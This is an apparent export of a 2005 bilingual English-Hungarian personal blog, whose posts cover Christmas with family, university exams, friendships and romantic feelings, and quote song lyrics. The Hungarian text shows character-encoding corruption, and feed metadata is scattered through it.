    -I haven't written for a while..again. I know I know....it is so hard to sit down and write the way I used to these days. :( I had exams till 20th of December...so I had absolutly no X-Mas feeling. Only the wonderful smell of cookies each day reminded me Christmas was coming as my mom was baking all kinds of cakes in the past 2 weeks. So after surviving my exam on the 20th I started to make the presents for mom and dad...only one was ready. -
    -
    -Christmas day has come and it was just so wonderful as we were standing at the tree and dad read the verse from the Bible and we prayed and then set down to dinner. -
    -
    -Finally the time came when we gave each others the gifts...oh I was so excited...will they like the presents I made for them by myself with so much love?! They did. When they opened one of the gifts from me..I saw that mom's eye was shining from tears...and then I just started to cry....at that time I felt the love for them so much it hurt...I LOVE YOU MOM AND DAD. I am thankful for God for my family...they mean everything to me on this Earth. -
    -
    -On the 25th my whole big family was here .....9 person + a big dog in a small room...but you know the sayin about good people in a small room :) And on the 26th and 27th we were at mom's best friend's house. It was fine. Especially cause Zaza was there who is the lovliest lil boy on the whole wide world..until I don't have my own baby :) I love him! He is tooooooo cute! So I had a really busy Christmas. I miss Fanni so bad..it is so strange that we didn't meet on Christmas day :( But I know she is doing well she is happy and that makes me happy too. KisHerceg has sent me a greetings card....it made me soooo happy. It was so good to hold it in my hands and to know he was thinking of me at Christmas. And I am such a loser I had no time to write to him a real e-mail...only short one to let him know i think of him. But no when I look at our e-mails and see how many he has written and how many I have ... I feel bad :( -
    -
    - -I feel soemthing is wrong with these colors in the new desing....I mean dark red and green..typical X-Mas feeling but these are not so fun colors :) But I'm too lazy to change it...anyway..I won't have this for a long time...but I wanted some X-Mas feeling in my blog. Maybe it make you forget I haven't written for a long time (: -
    -
    - -
    -
    -
    -
    -
    - -KARֳCSONYOLֳS - -
    -
    - - -
    -
    -
    -
    -
    -Elֳ©gedetlen vagyok az ֳ÷j design szineivel. Persze best of KArֳ¡csony a sֳ¶tֳ©t zֳ¶ld ֳ©s bordֳ³...de a rֳ¡m jellemzֵ‘ ֵ‘rֳ¼let egy kicsit hiֳ¡nyzik belֵ‘le. Anyway...akarta valami X-Mas feelinget csempֳ©szni a blogba. Rֳ¡adֳ¡sul az angol felֳ©t tegnap ֳ­rtam meg a postnak ֳ©s ֳ¡ֳ¡ֳ¡ֳ¡ֳ¡ֳ¡ֳ¡ fֳ©lֳ¡lmoban ֳ©s mֳ¡r azzal is elֳ©gedetlen vagyok, de ֳ÷jraֳ­rni most is fֳ¡radt vagyok. Ma eddig semmi sem tetszik...bal lֳ¡bbal keltem fel. A family sehol, engem meg az ֵ‘ szilveszteri programjuk miatti telefon ֳ©breszt... -
    -
    -Most nem tetszik a kedvem...ki nem ֳ¡llhatok ilyen morc lenni. Talֳ¡n ha kiֳ­rom magambֳ³l akkor jobb lesz. Pedig igazibֳ³l csak az a baj, hogy ֳ÷gy szeretnֳ©m, h nem lenne ma mֳ¡r 1000kֳ¶telessֳ©gem...ֳ©lvezhetnֳ©m pihizֳ©ssel a szֳ¼netet ֳ©s nem kֳ©ne, hogy az ֳnnepek alatt lelkiismeret furdalֳ¡som ֳ©s rֳ©mֳ¡lmom legyen, ha megnֳ©zek 1 filme tvagy 11ig alszok. -
    -
    -Szֳ³val eme rֳ¶vid bevezetֵ‘ utֳ¡n most rֳ¡tֳ©rek a tegnapi mondandֳ³m magyarba konvertֳ¡lֳ¡sֳ¡ra. -
    -
    -Mֳ¡r megint sokֳ¡ig nem ֳ­rtam....de nehֳ©z lett volna. 20.ֳ¡n mֳ©g vizsgֳ¡ztam ֳ©s egy morzsֳ¡nyi Karֳ¡csony hangulatom sem volt. ֳgy 24.ֳ©ig volt 3 nqapom az ajֳ¡ndֳ©kok elkֳ©szֳ­tֳ©sֳ©re. Bֳ¡r anyuֳ©k egyik ajֳ¡ndֳ©ka mֳ¡r kֳ©sz volt, a tֳ¶bbi csak megtervezve volt. Mindne elkֳ©szֳ¼lt idֵ‘ben, ֳ­gy 24ֳ©n mֳ¡r teljes nyugiban kֳ©szֳ¼ltem a familyvel a Karֳ¡csonyra. Aztֳ¡n mֳ¡r ott ֳ¡lltunk mikor apa felolvasott a Bibliֳ¡bֳ³l, imֳ¡dkoztunk ֳ©s jֳ¶hetett a fincsi ֳ¼nnepi vacsora. Oh yeah! Az ajֳ¡ndֳ©kozֳ¡snֳ¡l teljes izgalomban voltam, hogy hogy tetszenek majd az ajֳ¡ndֳ©kok anyuֳ©knak...de nagyon ֳ¶rֳ¼ltek neki. Annyira jֳ³ ֳ©rzֳ©s. Egyik ajֳ¡ndֳ©k bontֳ¡sakor lֳ¡ttam anya szemֳ©ben megcsillant 1 kֳ¶nnycsepp...de ֳ©n nem bֳ­rtam ki...ֳ©reztem, hogy mֳ¡r visszafordֳ­thatatlanul gֳ¶rdֳ¼lnek a kֳ¶vֳ©r kֳ¶nnycsepek az arcomon. Abban a pillanatban annyira nagyon ֳ©reztem, mennyire szeretem ֵ‘ket, hogy szinte fizikailag fֳ¡jt...csak ֳ¡tֳ¶leltem ֵ‘ket ֳ©s sֳ­rtam. Nem is tudom...mֳ©g soha ֳ©letemben nem lֳ¡ttak sֳ­rni ilyen ֳ©rzelmek miatt...s soha nem is vֳ­gasztaltak, ֳ¶leltek ֳ¡t ilyesmi miatt. Lֳ¡ttak sֳ­rni sokszor...vֳ­gasztaltak 1000szer..ha ֳ¡jt valamim, ha valami film szomorֳ­tott el, ha a suli nem ment ....de ilyen ֳ©rzelmek miatt mֳ©g sose...mindig ֳ©szrevֳ©tlenֳ¼l sֳ­rok itthon ilyesmik miatt. Kimondhatatlanul hֳ¡lֳ¡s vagyok apֳ¡ֳ©rt ֳ©s anyֳ¡ֳ©rt. Itt a Fֳ¶ldֳ¶n ֵ‘k a legdrֳ¡gֳ¡bbak szֳ¡momra. -
    -
    -25.ֳ©n aztֳ¡n az egsֳ©z nagy csalֳ¡d betֳ¶mֳ¶rֳ¼lt hozzֳ¡nk a kis lakֳ¡sba, ahol a szobֳ¡ban 1 gombostֵ±t nem lehetett ledobni....de egyֳ¼tt voltuk, s mindenki ismeri a mondֳ¡st a jֳ³ emebrekrֵ‘l ֳ©s a kis helyrֵ‘l. A rֳ¡kֳ¶vetkezֵ‘ 2 napban pedig anyu barֳ¡tnֵ‘jֳ©ֳ©knֳ©l voltunk. ֳ‰s mֳ¡sodik nap ott volt Zaza baba aki a vilֳ¡g legtֳ¼ndֳ©ribb, legmanֳ³bb kisbabֳ¡ja...s az is marad, mֳ­g nem lesz sajֳ¡tom. Rֳ¡adֳ¡sul totֳ¡l odavan ֳ©rtem. ֳ–lelget, huncutul rֳ¡mmosolyog. Mֳ¡snak nem hagyja,hogy ֳ¡tֳ¶ltֳ¶ztesse nekem hagyta..csak mosolygott. Simogat, rֳ¡mnevet...imֳ¡dom! Minden kisgyereket nagyon szeretek, de ֵ‘ egyszerֵ±en teljesen levesz a lֳ¡bamrֳ³l. -
    -
    -Elֳ©g zsֳ÷folt ֳ­gy a Karֳ¡csony...de teli mosolyal ֳ©s ֳ¶rֳ¶mmel...csak Fanni hiֳ¡nyzik. De jֳ³ helyen van ֳ©s ez a lֳ©nyeg. -
    -
    -Kaptam 1 kֳ©peslapot KisHercegtֵ‘l...teljesen meghatֳ³dtam rajta. Van mindig valami kֳ¼lֳ¶nleges abban, amikor rendes levelet kapok..jֳ³ ֳ©rzֳ©s volt ott tartani a kezemben a apot, olvasni, amit ֳ­rt rֳ¡ nekem ֳ©s tudni, hogy gondolt rֳ¡m. El is szomorֳ­t a dolog, mert ha megnֳ©zem az e-mailjeinket...az elmֳ÷lt pֳ¡r napan ֵ‘ tֳ¶bbet is ֳ­rt..s ֳ©n alig vֳ¡laszoltam...kevֳ©szser ֳ©s csak pֳ¡r sort ֳ­rtam. S nem azֳ©rt, mert nem gondolok rֳ¡, vga ymert nem fontos..nagyon is az, de nem tudtam neki ֳ­rni. S most roszs ֳ©rzֳ©s, hogy nem tudhatja mennyire fontos nekem. :( -
    -
    -Remֳ©lem mindenkinek boldogan telt a Karֳ¡csony, s legalֳ¡bb annyira lefoglalt tieteket az ֳ¶rֳ¶mkֳ¶dֳ©s a csalֳ¡ddal, barֳ¡tokkal, a bejglee evֳ©s, sֳ¼ti pusztֳ­tֳ¡s, mint enegm...s talֳ¡n nem haragxik rֳ¡m sneki, amiֳ©rt nem ֳ­rtam. Love ya guys! -
    -
    -
    -false -
    - - - -Hiphopstah-AnitaBee - -2005-12-19T20:07:00+01:00 -2005-12-19T19:33:39Z -2005-12-19T19:27:03Z - -tag:blogger.com,1999:blog-8512831.post-113502042344501555 -My song - -
    -
    Most hallottam elֵ‘szֳ¶r ezt a szֳ¡mot ֳ©s az elsֵ‘ mp-tֵ‘l odaszֳ¶gezett a tv elֳ©...mֳ©g levegֵ‘t is alig vetem. Csak hallgattam. Mintha valaki most dalt ֳ­rt volna arrֳ³l, ami bennem zajlik. S ha egy nֵ‘ ֳ©nekelnֳ© 1 fickֳ³nak...akkor azt mondanֳ¡m, hogy ֳ©n ֳ­rtam, mert mֳ¡s nem ֳ©rezheti pont ezt..annyira jֳ³ֳ³ֳ³ֳ³ֳ³ֳ³ֳ³ֳ³ֳ³. Meg kellett talֳ¡lnom ezt a szֳ¡mot..mert segֳ­t tovֳ¡bblֳ©pni
    -
    -
    -I've just caught a song on tv...and it took my breath away. It is just so beautiful. Right now if you could hear the music playin in my soul it would sound like that...and the lyric...I couldn't express my feelings so good as in this song...but right now every single word is so true for me. And if this song was written by a woman I would say it is impossible that she feels exactly the same way...I know I had to find this song now..to help me through
    -
    -
    -
    James Blunt - Goodbye My Lover Lyrics
    -
    -
    Did I disappoint you or let you down?
    Should I be feeling guilty or let the judges frown?
    'Cause I saw the end before we'd begun,
    Yes I saw you were blinded and I knew I had won.
    So I took what's mine by eternal right.
    Took your soul out into the night.
    -It may be over but it won't stop there,
    I am here for you if you'd only care.
    You touched my heart you touched my soul.
    You changed my life and all my goals.
    -
    -And love is blind and that I knew when,
    My heart was blinded by you.
    -
    -I've kissed your lips and held your head. -
    -Shared your dreams and shared your bed.
    -I know you well, I know your smell.
    I've been addicted to you.
    -
    -
    -Goodbye my lover.
    Goodbye my friend.
    You have been the one.
    You have been the one for me.
    -
    -
    I am a dreamer but when I wake,
    You can't break my spirit - it's my dreams you take.
    And as you move on, remember me,
    Remember us and all we used to be
    I've seen you cry, I've seen you smile.
    -I've watched you sleeping for a while.
    I'd be the father of your child.
    -I'd spend a lifetime with you.
    -
    I know your fears and you know mine.
    We've had our doubts but now we're fine,
    -And I love you, I swear that's true. -
    -
    - -
    -I cannot live without you. -
    -
    -
    Goodbye my lover.
    Goodbye my friend.
    You have been the one.
    You have been the one for me.
    -
    -And I still hold your hand in mine.
    In mine when I'm asleep.
    -
    And I will bear my soul in time,
    When I'm kneeling at your feet.
    Goodbye my lover.
    Goodbye my friend.
    You have been the one.
    You have been the one for me.
    I'm so hollow, baby, I'm so hollow.
    I'm so, I'm so, I'm so hollow.
    -
    -
    -
    -
    -false -
    - - - -Hiphopstah-AnitaBee - -2005-12-19T19:18:00+01:00 -2005-12-19T18:23:19Z -2005-12-19T18:23:19Z - -tag:blogger.com,1999:blog-8512831.post-113501659985492791 -Ejha - -
    A mai napomrֳ³l..egֳ©szen pontosan a tegnap ֳ©s ma talֳ¡lkozֳ¡sֳ¡nak idֵ‘pontjֳ¡rֳ³l majd beszֳ¡molok, mert most nem tudok elmerֳ¼lni a dolgoban, mert ki se lֳ¡tok az Eurֳ³pai Uniֳ³s pֳ¡lyֳ¡zatok ֳ©s projectmanagement gyֳ¶nyֳ¶rei cֳ­mֵ± tֳ¡rgybֳ³l. Wohooooooooooo!
    -
    -false -
    - - - -Hiphopstah-AnitaBee - -2005-12-18T14:47:00+01:00 -2005-12-19T18:15:01Z -2005-12-19T18:10:53Z - -tag:blogger.com,1999:blog-8512831.post-113501585309932394 -Wor(l)ds - the last 5 days - -
    -Learnin - for my exam on friday
    -Tears - Cause I miss Fanni so bad
    -Worry - Cause she is far away and I can't be by her side...and her back hurts
    -Hug - from Fanni, cause msn exists
    -Birthday - of Adam, who has been my friend since we were 3 years old
    -Smile - for our phone conversation
    -Exam - Cause knowlegde is power..and noone can take that away from me
    -Crossed-finegrs - for the 2 girlies I love so much cause they have language exams
    -Sad - I miss Molni and he needs me but I was not there for him
    -E-Mails - for KisHerceg who lives
    -Feelings - cause KisHerceg is
    -Confused - Idon't know what he really feels-thinks
    -Tears - for love...I need love, and without Fanni I'm even more miserable
    -Tears - for tomorrow..the day I have been waiting for since September
    -Fear - Cause he will hurt me
    -just Lookin at Him - Cause I will be far away from him
    -Crash - Cause my heart hasn't learnt to do this quitely
    -Smile - his smile which hasn't changed
    -Tears - for seeing this smile
    -
    - -Tears -, cause that's me, cause I'm not that strong as most of you think
    -
    -
    -
    -
    - -Tanulֳ¡s - egֳ©sz nap, mert vizsgֳ¡zni fogok
    -Kֳ¶nnycsepp - mֳ¡r hiֳ¡nyzik Fanni
    -Aggodalom - mert meszse van Fanni, s fֳ©ltem, s fֳ¡j a hֳ¡ta
    -ֳ–lelֳ©s - virtuֳ¡lisan Fannitֳ³l, mert van msn
    -Szֳ¼linap - ֳdֳ¡mֳ©, akivel 3 ֳ©ves korunk ֳ³ta barֳ¡tok vagyunk
    -S mosoly - mert rֳ©g beszֳ©ltֳ¼nk
    -Vizsga - mert amit tudok azzzal ֳ©rtֳ©kesebb leszek, s nem vehetik el tֵ‘lem a tudֳ¡st
    -Drukk - mert kֳ©t nagyon kedves barֳ¡tom N-gilr ֳ©s E-girl nyelvvizslֳ¡zik
    -Szomor - mert Molni hiֳ¡nyzik, s szֳ¼ksֳ©ge lenne rֳ¡m,de nem votlma ott neki
    -E-mailek - mert van KisHerceg
    -ֳ‰rzelmek - mert Kisherceg
    -ֳ–sszezavarodottsֳ¡g - mert nem lֳ¡thatok a fejֳ©be
    -Kֳ¶nnyek - mert szereett hiֳ¡nyom van...s Fanni nֳ©lkֳ¼l ez csak mֳ©g nehezebb.
    -Kֳ¶nnyek - mert a holnapi napra vֳ¡rok szeptember ֳ³ta
    -Fֳ©lelem - mert meg fog sebezni
    -s csak nֳ©zem ֵ‘t - mert messze leszek tֵ‘le
    -Csֳ¶rֳ¶mpֳ¶lֳ©s - mert kihallatszik a szivembֵ‘l
    -Mosoly- ami ugyanolyan az ֵ arcֳ¡n
    -Kֳ¶nnyek - mert annyira jֳ³ ֵt mosolyogni lֳ¡tni
    -
    - -Kֳ¶nnyek -, mert ֳ©n ֳ­rok, mert ֳ©rzek, mert sebezhetֵ‘bb vagyok, mint mutatom.
    -
    -
    -
    -false -
    - - - -Hiphopstah-AnitaBee - -2005-12-13T16:06:00+01:00 -2005-12-19T17:45:05Z -2005-12-19T17:26:01Z - -tag:blogger.com,1999:blog-8512831.post-113501316140911889 -Ammm oh well - -
    -
    -
    -
    The horror...as you are waiting for your exam and know it doesn't matter what you have learnt...cause he knows the result at the very first moment he looks at you entering the door. I know he is a psycho...But I simply can not flirt with a teacher..ugh..I'm not that kind of girl.
    -
    We knew that the key to success was blond hair, green eyes and big boobs...so who know me can imagine how scared I was with not having any of these. That's okay with me, cause I never mind tellin jokes on how tiny mine are..sometimes it's fun to be ironic.
    -
    As I was waiting for the executor...I was tooo scared. Finanally I could give an almost right answer to his crazy no sence question...N almost kicked my leg under the table cause I was never looking into his eyes as he was looking at me in a ....... way. I can't help..it's disgusting! So thanks not to tiny skirt and winks...but thanks to the book I read and my two beautiful friends who made such an impact on this man, that he gave a 4 to me I passed this exam. Maaaaaaan I was so happy. As he was writing the note in my index I was taping my feet under the table for stayin alive beats :) It's oveeeeeeeeeeer!
    -
    Now nothing can stop me, although I have to see the most handsome dentist this evening. Well..it is strange, cause he looks so cool, he is crazy, basketball player, has humor...sexy..and his whole arm is in my mouth... :) But some girls even flirt with their gynecologist...yakkkkk... :/
    -
    But if a guy has good hands for basketball and also good heart for it, then everythings just fine :)
    -
    -
    -
    -
    -
    -Nincs semmi rֳ©misztֵ‘bb annֳ¡l, mint amikor tudod semmit nem tehetsz az ֳ©rdekֳ©ben, hogy ֳ¡tmenj a vizsgֳ¡n. Pontosֳ­tok..van aki tehet, neked se gyomrom se szemֳ©lyem nincs ilyesmihez. Ez a mondat nyelvtanilag kritizֳ¡lhatֳ³, de egyet mondok ne szֳ³ֳ³ֳ³j beee. -
    -
    -A tanֳ¡r sorra vֳ¡gta ki az embereket, sa flֳ¶rtֳ¶lj ֳ©s tedd ki a melled az ֳ©letbenmaradֳ¡sֳ©rt elv a napok ֳ©s vizslֳ¡k elֵ‘rehaladtֳ¡val egyre intenzֳ­vebb volt. A tanֳ¡r ideֳ¡lja a szֵ‘ke haj, zֳ¶ld szem nagy mell...s aki ismer tudja ezen tulajdonsֳ¡gok egyikֳ©vel sem ֳ¡ldott meg az ֳr...bֳ¡r ezt nem bֳ¡nom, mert ֳ©n ֳ­gy vagyok ֳ©n. ֳ‰s ha nem tehetnֳ©k ֳ¶nirֳ³niuks megjegyzֳ©seket magamra "mellesleg" az unalmas lenne (: -
    -
    -A folyosֳ³n vֳ¡rakozֳ¡skor mֳ¡r a szֳ­vroham kerֳ¼lgetett ֳ©s remegett kezem lֳ¡bam...utoljֳ¡ra nentom mikor parֳ¡ztam vmitֵ‘l ennyire. Aztֳ¡n bementֳ¼nk, s az ֳ©n mondandֳ³mba kicsit belekֳ¶tֳ¶tt, amit kֳ©sֵ‘bb N-girl azzal magyarֳ¡zott, hogy majdnem bokֳ¡nrugot, amiֳ©rt ֳ©n nem nֳ©ztem a tanֳ¡r szemֳ©be...sajnֳ¡lom...nem megy...Velem ne flֳ¶rtֳ¶ljֳ¶n. Bleeeeeeh. Hֳ¡la azonban annak a 63 oldlanak, amit elolvastam, lֳ©lekjelenlֳ©temnek, hogy nem ֳ¡jultam le a szֳ©krֵ‘l, s kֳ©t csodaszֳ©p barֳ¡tnֵ‘mnek, akikkel egyֳ¼tt vizslֳ¡ztam 4est kaptunk...mֳ©g szerencse, hogy ֵ‘k az ֳ©n nevemben is elbֵ±vֳ¶ltֳ©k. Fujj.... Tֳ÷lvagyok rajta...el se hiszem. Azt hiszem abban a pillanatban, amikor elkezdte beֳ­rni a jegyet a lֳ¡bam mֳ¡r a pad alatt a Stayin' alive ֳ¼temֳ©t dobolta ki :) -
    -
    -Holnap megtudom az utirgazdvez2 eredmֳ©nyֳ©t..ֳ©s pֳ©nteken megabrutֳ¡l vizsla...de ma mֳ©g fogorvos a leghelyesebb fogorvossal...bֳ¡r nem mintha sokat ismernֳ©k, egyֳ©bkֳ©nt meg kicsit strange, hogy hֵ±dehelyes, de kֳ¶nyֳ©kig belelֳ³g a szֳ¡mba...bֳ¡r egyesek a nֵ‘gyֳ³gyֳ¡sszal is simֳ¡n kikezdenek. Gusztus dolga. Mindnekֳ©pp pulszpont, hogy hatalmas kosaras, kedves, laza iszonyat szֳ¶vege van...s hey! Akinek yo keze van a kosֳ¡rlabdֳ¡hoz ֳ©s yo szive hozzֳ¡, annak bֳ¡tran fexem a keze alֳ¡. -
    -
    - -false - - - - -Hiphopstah-AnitaBee - -2005-12-11T15:25:00+01:00 -2005-12-11T14:41:38Z -2005-12-11T14:35:13Z - -tag:blogger.com,1999:blog-8512831.post-113431171325572170 -oldies - -
    Gֳ¡z vagy sem ma vֳ©gre beszereztem egy best of rֳ©gi music-ot, ami aztֳ¡n szֳ¶ges ellentֳ©te mindenfֳ©le rap-nek vagy hiphop-nak. Bֳ¡r tֳ©ny, hogy ami emellett yo zene azt ֳ©n ֳ©rtֳ©kelem ֳ©s ֳ­gy van 1-2 szֳ¡m, ami teljesen mֳ¡s mֵ±faj mֳ©gis tetszik.
    Most annyira tetszik, hogy egֳ©sz nap ezt ֳ©neklem s bֳ¡r kicsit fura, mert egy napsֳ¼tֳ©ses naphoz kֳ¶tnֳ©m a dolgot, vagy egy karaoke-s nyֳ¡ri estֳ©hez...de az ֳ©letem soundtrackjֳ©n simֳ¡n szerepelne...s bֳ¡r nem ebben a tֳ©mֳ¡ban de a reflֳ©n, hogy would I lie to you...most mֳ©g illik is az utֳ³bbi ֵ‘szintesֳ©g stuffhoz.
    -
    -
    -I can't help I just like this song. Actually I have been playin it over and over...though it has nothing to do with rap or hiphop. Yep I like some other music too. But I'm not the type who loves all the same, her parents used to like. Listening to this song makes me imagine a sun shiny day or a hot summer night with karaoke when it's a lot of fun to sing these old songs...so now it's a little bit strange vision in middle of december...anyway it is so cooool. Can't stop singing
    Hoagie1...oh it was so good to hear from you again. Sorry I had no time to blog and just wrote down it in hungarian yestarday...cause I had no time to post since 27th november :( Now I'm back...or at least I hope so..and will do my best to have time to write in english too. I'm glad you're back ;) ou always make me smile or roll on floor laughin with your posts.
    -
    -
    Look into my eyes
    Can't you see they're open wide
    Would I lie to you baby
    Would I lie to you (oh yeah)
    Don't you know it's true
    Girl there's no one else but you
    Would I lie to you baby yeah
    -
    Everybody wants to know the truth
    In my arms is the only proof
    I've hidden my heart behind the bedroom door
    Now it's open I can't do no more
    I'm telling you baby you will never find another girl
    In this heart of mine
    -
    Look into my eyes
    Can't you see they're open wide
    Would I lie to you baby
    Would I lie to you (oh yeah)
    Don't you know it's true
    Girl there's no one else but you
    Would I lie to you baby yeah
    -
    Everybody's got their history
    On every page a mystery
    You can read my diary you're in every line
    Jealous minds never satisfied (satisfied)
    I'm telling you baby you will never find another girl
    In this heart of mine
    -
    Look into my eyes
    Can't you see they're open wide
    Would I lie to you baby
    Would I lie to you (oh yeah)
    Don't you know it's true
    Girl there's no one else but you
    Would I lie to you baby yeah
    -
    (Would I lie to you)
    When you wanna see me night and day
    (would I lie to you)
    If I tell you that I'm here to stay
    (Would I lie to you)
    Do you think I give my love away
    (would I lie)
    That's not the kind of game I play
    -
    I'm telling you baby you will never find another girl
    In this heart of mine
    -
    Look into my eyes
    Can't you see they're open wide
    Would I lie to you baby
    Would I lie to you (oh yeah)
    Don't you know it's true
    Girl there's no one else but you
    Would I lie to you baby yeah
    Would I lie to you
    -
    Look into my eyes
    Can't you see they're open wide
    Would I lie to you baby
    Would I lie to you (oh yeah)
    Don't you know it's true
    Girl there's no one else but you
    Would I lie to you baby yeah
    Would I lie to you
    -
    -false -
    - - - -Hiphopstah-AnitaBee - -2005-12-11T14:56:00+01:00 -2005-12-11T14:24:39Z -2005-12-11T14:24:39Z - -tag:blogger.com,1999:blog-8512831.post-113431107957521863 -ֳ–rֳ¼lֳ¶k neki?! - -
    -
    Amikor valֳ³ra vֳ¡lik az aminek a gondolatֳ¡val korֳ¡bban csak eljֳ¡tszottֳ¡l az tuti kivֳ¡lt valamilyen hatֳ¡st. Belֵ‘lem elֵ‘szֳ¶r a szokֳ¡sosnֳ¡l 10szer gyorsabb szֳ­vdobogֳ¡st, elpirulֳ¡st, gyomorֳ¶sszerֳ¡ndulֳ¡st vֳ¡ltotta ki, de mindekֳ¶zben a szivem legeslegtֳ¡volabbi csֳ¼cskֳ©ben mֳ©gis ֳ÷gy ֳ©reztem, hogy ez yo.
    -
    KisHerceg vmi zene kapcsֳ¡n elejtett megjegyzֳ©sekor villֳ¡mkֳ©nt csapott belֳ©m a felismerֳ©s, hogy ֵ‘ rֳ¡talֳ¡lt a bloggomra. Hogy vֳ©letlenֳ¼l pont az orra elֵ‘tt hevert, amirֵ‘l ֳ©n nem is tudtam most mֳ¡r teljesen lֳ©nyegtelen. Persze nyilvֳ¡nos blog...bֳ¡rki rֳ¡talֳ¡lhat, de kevֳ©s az esֳ©ly rֳ¡, hogy vmit beֳ­rva a keresֵ‘be pont rֳ¡mbukkan, esetleg vki linkjei kֳ¶zֳ¶tt tֵ±nֳ¶k fel neki. Ezֳ©rt nem is szֳ¡mֳ­tottam erre.
    -
    Mֳ¡r fogalmam sincs hֳ¡nyszor jutott eszembe, vajon mi tֳ¶rtֳ©nne ha Peti olvasna el egyszer. Olyankor ֳ÷gy ֳ©rzem biztos eljֳ¶nne a "vilֳ¡gvֳ©ge" ֳ©s vakondkֳ©nt kֳ¶zlekednֳ©k, de titkon taln vֳ¡gyom is erre, mֳ¡rmint nem a vilֳ¡gvֳ©gֳ©re, hanem arra, hogy elolvassa....bֳ¡r biztosan a szֳ©k is kidֵ‘lne alla a meglepetֳ©stֵ‘l ֳ©s dֳ¶bbenettֵ‘l...talֳ¡n utֳ¡na tanֳ¡csosabb lenne soha nem a szeme elֳ© kerֳ¼lni DE talֳ¡n vmi egֳ©szen nem vֳ¡rt fordulat kֳ¶vetkezne....akֳ¡rmi is lenne nem kֳ©ne fֳ©lnem tֵ‘le..nem fֳ©lek...mert az ֵ‘szintesֳ©gnek igenis nagy ereje van. Talֳ¡n sebezhetֵ‘vֳ© vֳ¡lnֳ©k, ha elolvasna, hisz ez ֳ©n vagyok 100%ig...a teljes nyitott kֳ¶nyv...de nincs mit takargatnom. S amֳ­g az ֵ‘szinte ֳ©rzֳ©seim vannak itt addig nem is lehet baj...Talֳ¡n olyat tudna meg rֳ³lam, amit egyֳ©bkֳ©nt sose mondtam volna el neki...s talֳ¡n olyna ֳ©rtֳ©kekre bukkanna amit ֳ©szre sem vett. De ha ez alapjֳ¡n elֳ¡snֳ¡m magam elֵ‘tte, akkor emelt fֵ‘vel tֳ¡vozok, mert ez ֳ©n vagyok..s ha szeret ֳ­gy szeret..sֵ‘t szeret meg mֳ©gjobban...ha pedig megutֳ¡l, akkor talֳ¡n jobb elֵ‘bb megtudnom. Ezֳ©rt van, hogy mostmֳ¡r van hogy az ֵ‘ nevֳ©t is leֳ­rom..igen hogy tudja ne csak sejtse, ha vֳ©letlen ide talֳ¡lna, hogy ֵ‘ az "ֵ, ֳ‰rte, Neki, ֵt stb"
    -
    Arra viszont, hogy KisHerceg elolvashat sosem gondoltam, pedig hasonlֳ³an izgulnֳ©k, hogy mit szֳ³l. De most mֳ©gis ֳ¶rֳ¼lֳ¶k neki...talֳ¡n ez az a valami, aminek meg kellett tֳ¶rtֳ©nnie, hogy letisztֳ¡zֳ³djon, hogy hogy is viszonyulunk egymֳ¡shoz. Afelֵ‘l, hogy ֳ©n hol wok az ֵ‘ szemֳ©ben azt nem tudom...nֳ©ha a teljesen naֳ­v szֳ©dֳ­tett girl-nek, nֳ©ha barֳ¡tnak, nֳ©ha vmi kֳ¼lֳ¶nleges de nemtom kategorizֳ¡lni minek ֳ©rzem magam. S hogy ֵ‘ hol van az ֳ©n szememben...nem tudom. Volt mֳ¡r sok helyen de valahogy mindig tֳ¶rtֳ©nt vmi ami elbizonytalanֳ­tott, hogy szivem melyik polcֳ¡n van a helye...a barֳ¡trֳ³l mindig lemֳ¡szik...hol mert nem beszֳ©lֳ¼nk hol mert beszֳ©lֳ¼nk ֳ©s akkor az a mֳ¡sik irֳ¡nyba zavar ֳ¶ssze. Tegnap vֳ¡laszt kaptam tֵ‘le a kesze kusza e-mailre, amit a Segֳ­tֵ‘tali utֳ¡n ֳ­rtam neki....mֳ¡r lemondam a vֳ¡laszrֳ³l. Vajon az, hogy rֳ¡talֳ¡lt a blogomra az egyik oka, hogy mֳ©gis vֳ¡laszolt? Nem tudom. Csak azt, hogy volt 1-2 mondat ami kֳ¶nnyet csalt a szemembe, mert annyira ֵ‘szintֳ©nek tֵ±nt...ugyanakkor ֳ¶sszezavar. Nem tudom hogyan fogok rֳ¡ vֳ¡laszolni...bֳ¡r tudnֳ©k ֳ÷gy ֳ­rni neki, ahoyg most ֵ‘ ֳ­rt nekem..vagyos, hogy hasonlֳ³ hatֳ¡st ֳ©rjek el. Mert ez az e-mail nost nagyon kedves ֳ©s kֳ¼lֳ¶nleges szֳ¡momra...egyenlֵ‘re nem is olvastam el csak 1szer...de Nֳ³ri elolvasta ֳ©s azonnal telefont ragadott ֳ©s csak annyit tudott mondnai, hogy "yay pici lֳ¡ny". Remֳ©lem egyszer teljesen kitisztul bennem az ֳ©rzֳ©s ֳ©s minden kֳ©rdֵ‘jel eltֵ±nik, de adidg is biztosan kֳ¼lֳ¶nleges helye lesz a szivemben ...s majd idֵ‘vel csak nevetni fogok ezen, hogy mennyire kis ֳ©rtetlen voltam.
    -
    Ha mindent elolvas...oh nyekkk...fura lenne. Mֳ©gis tudom ֵ‘ olyna valaki aki tֳ©nyleg ismerhetnֳ© minden egyes ֳ©rzֳ©semet, gondolatomat, mert elmondanֳ¡m neki, megosztanֳ¡m vele, nem csupֳ¡n ֳ­gy blogbֳ³l leskelֵ‘dve tudnֳ¡....csak sosem nyֳ­lt rֳ¡ lehetֵ‘sֳ©g, hogy tֳ©nyleg elmondjam. Vagyis amikor ketten beszֳ©lgettֳ¼nk szinte mindig ilyen kֳ¼lֳ¶nleges ֵ‘szinte 110% Anita bezsֳ©lgetֳ©s volt...csak kevֳ©sszer tudtunk ֳ­gy beszֳ©lgetni. Talֳ¡n ezֳ©rt nem is ֳ©rzem ֳ÷gy, hoyg illetֳ©ktelen kezekbe kerֳ¼ltem. Mert az, hogy belֳ©mlֳ¡t sebezhetֵ‘vֳ© tesz, de tudom sose bֳ¡ntana meg..ֳ­gy vֳ©dve vagyok.
    -
    -
    -false -
